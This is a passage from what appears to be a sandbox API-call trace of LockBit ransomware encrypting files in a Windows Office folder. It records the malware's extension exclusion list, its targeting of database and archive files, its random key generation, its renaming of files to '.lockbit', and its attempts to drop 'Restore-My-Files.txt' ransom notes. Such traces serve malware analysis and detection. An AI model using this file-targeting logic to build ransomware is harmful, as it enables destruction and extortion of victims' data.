ftCreationTime.dwLowDateTime=0x449b6900, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcd0a560, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x449b6900, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x370, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21297_.GIF", cAlternateFileName="")) returned 1 [0204.106] lstrcmpiW (lpString1=".", lpString2="BD21297_.GIF") returned -1 [0204.106] lstrcmpiW (lpString1="..", lpString2="BD21297_.GIF") returned -1 [0204.106] PathFindExtensionW (pszPath="BD21297_.GIF") returned=".GIF" [0204.106] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.106] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.106] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.106] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.106] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.106] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.106] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.106] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.106] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.106] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.106] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.106] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.107] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.107] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.107] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.107] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.107] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.107] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.107] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.107] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.107] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.107] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.107] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.107] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.107] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.107] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.107] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.107] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.107] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.107] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.107] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.107] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.107] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.107] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.107] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.107] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.107] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.107] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.107] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.107] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.107] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.107] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.108] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.108] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.108] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.108] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.108] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.108] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21297_.GIF") returned 1 [0204.108] lstrcmpiW (lpString1="ntldr", lpString2="BD21297_.GIF") returned 1 [0204.108] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21297_.GIF") returned 1 [0204.108] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21297_.GIF") returned 1 [0204.108] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21297_.GIF") returned -1 [0204.108] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21297_.GIF") returned 1 [0204.108] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21297_.GIF") returned 1 [0204.108] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.108] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21297_.GIF") returned=".GIF" [0204.108] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.108] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.108] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.108] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.108] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.108] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.108] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.108] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.108] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.108] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.108] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.108] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.108] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.108] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.108] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.108] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.108] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.109] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.109] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.109] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.109] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.109] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.109] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.109] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.109] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.109] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.109] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.109] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.109] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21297_.GIF.lockbit") returned 78 [0204.109] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21297_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21297_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0204.110] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.110] malloc (_Size=0x40068) returned 0x3d70450 [0204.110] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=880) returned 1 [0204.110] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.111] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0204.111] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.111] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.111] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0204.111] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0204.125] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21297_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21297_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.125] malloc (_Size=0xb2) returned 0x77d7a8 [0204.125] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d7a8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.125] free (_Block=0x77d7a8) [0204.125] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21297_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.125] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.125] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.125] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a914a00, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcd0a560, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x4a914a00, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x65, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21298_.GIF", cAlternateFileName="")) returned 1 [0204.125] lstrcmpiW (lpString1=".", lpString2="BD21298_.GIF") returned -1 [0204.125] lstrcmpiW (lpString1="..", lpString2="BD21298_.GIF") returned -1 [0204.125] PathFindExtensionW (pszPath="BD21298_.GIF") returned=".GIF" [0204.125] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.125] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.125] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.125] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.125] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.125] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.125] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.125] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.125] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.125] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.125] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.125] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.125] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.125] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.125] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.125] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.125] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.125] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.126] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.126] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.126] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.126] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.126] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.126] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.126] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.126] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.126] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.126] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.126] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.126] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.126] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.126] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.126] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.126] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.126] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.126] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.126] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.126] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.126] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.126] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.126] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.126] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.126] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.126] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.126] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.126] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.126] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.126] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21298_.GIF") returned 1 [0204.126] lstrcmpiW (lpString1="ntldr", lpString2="BD21298_.GIF") returned 1 [0204.126] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21298_.GIF") returned 1 [0204.126] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21298_.GIF") returned 1 [0204.127] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21298_.GIF") returned -1 [0204.127] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21298_.GIF") returned 1 [0204.127] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21298_.GIF") returned 1 [0204.127] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.127] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21298_.GIF") returned=".GIF" [0204.127] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.127] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.127] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.127] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.127] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.127] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.127] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.127] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.127] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.127] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.127] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.127] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.127] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.127] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.127] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.127] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.127] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0204.127] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0204.127] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0204.127] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0204.127] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0204.127] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0204.127] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0204.127] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0204.127] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0204.127] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0204.127] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0204.127] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0204.128] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21298_.GIF.lockbit") returned 78 [0204.128] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21298_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21298_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0204.129] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0204.129] malloc (_Size=0x40068) returned 0x3d70450 [0204.129] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=101) returned 1 [0204.129] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.130] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0204.130] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0204.130] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0204.130] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0204.130] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0204.133] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21298_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21298_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0204.133] malloc (_Size=0xb2) returned 0x77d7a8 [0204.133] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d7a8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0204.133] free (_Block=0x77d7a8) [0204.133] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21298_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0204.133] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0204.134] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0204.134] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49601d00, ftCreationTime.dwHighDateTime=0x1bd4d50, ftLastAccessTime.dwLowDateTime=0xbcd0a560, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x49601d00, ftLastWriteTime.dwHighDateTime=0x1bd4d50, nFileSizeHigh=0x0, nFileSizeLow=0x4f, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD21299_.GIF", cAlternateFileName="")) returned 1 [0204.134] lstrcmpiW (lpString1=".", lpString2="BD21299_.GIF") returned -1 [0204.134] lstrcmpiW (lpString1="..", lpString2="BD21299_.GIF") returned -1 [0204.134] PathFindExtensionW (pszPath="BD21299_.GIF") returned=".GIF" [0204.134] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0204.134] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0204.134] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0204.134] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0204.134] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0204.134] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0204.134] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0204.134] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0204.134] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0204.134] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0204.134] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0204.134] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0204.134] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0204.134] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0204.134] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0204.134] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0204.134] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0204.134] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0204.134] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0204.134] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0204.134] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0204.134] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0204.134] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0204.134] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0204.134] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.134] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0204.134] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0204.135] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0204.135] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0204.135] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0204.135] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0204.135] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0204.135] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0204.135] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0204.135] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0204.135] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0204.135] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0204.135] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0204.135] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0204.135] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0204.135] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0204.135] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0204.135] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0204.135] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0204.135] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0204.135] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0204.135] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0204.135] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD21299_.GIF") returned 1 [0204.135] lstrcmpiW (lpString1="ntldr", lpString2="BD21299_.GIF") returned 1 [0204.135] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD21299_.GIF") returned 1 [0204.135] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD21299_.GIF") returned 1 [0204.135] lstrcmpiW (lpString1="autorun.inf", lpString2="BD21299_.GIF") returned -1 [0204.135] lstrcmpiW (lpString1="thumbs.db", lpString2="BD21299_.GIF") returned 1 [0204.135] lstrcmpiW (lpString1="iconcache.db", lpString2="BD21299_.GIF") returned 1 [0204.135] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0204.135] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21299_.GIF") returned=".GIF" [0204.135] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0204.135] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0204.135] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0204.135] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0204.135] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0204.135] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0204.136] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0204.136] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0204.136] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0204.136] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0204.136] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0204.136] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0204.136] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0204.136] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0204.136] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0204.136] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0204.136] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") 